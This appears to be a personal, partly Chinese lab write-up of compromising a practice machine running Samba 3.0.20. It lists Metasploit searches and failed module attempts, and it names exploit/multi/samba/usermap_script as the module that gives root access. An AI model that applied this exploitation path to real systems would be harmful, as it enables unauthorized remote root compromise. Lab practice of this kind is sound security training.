10.10.10.3
scan
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
linux os
这个training应该很简单,以前做过:
139端口——smbclient
kiotrix靶机(139端口samba)
得知服务版本
Samba 3.0.20-Debian
trying 1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| locate exploits/linux/remote/9950.rb
[*] exec: locate exploits/linux/remote/9950.rb
/root/exploit-database/exploits/linux/remote/9950.rb
/usr/share/exploitdb/exploits/linux/remote/9950.rb
msfconsole
search -h
search platform:linux type:exploit samba
exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
use exploit/linux/samba/setinfopolicy_heap
show options
查看Exploit target:
2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10
这个payload目标不对,于是
back
|
导入msf载荷
| cd /root/.msf4/modules/exploits/
mkdir samba3.0.21-3.0.24
cd samba*
cp /root/exploit-database/exploits/linux/remote/9950.rb .
重新启动msfconsole
search samba3
|
突然发现,目标版本好像不符合条件,samba3.0.21-3.0.24
ORZ,太粗心了
trying2:
Samba < 3.0.20 - Remote Heap Overflow
exp是一些C代码,需要编译运行,而且注释是意大利语的。。
trying3:
google搜索Samba 3.0.20
https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
exploit/multi/samba/usermap_script
执行后,直接就是root权限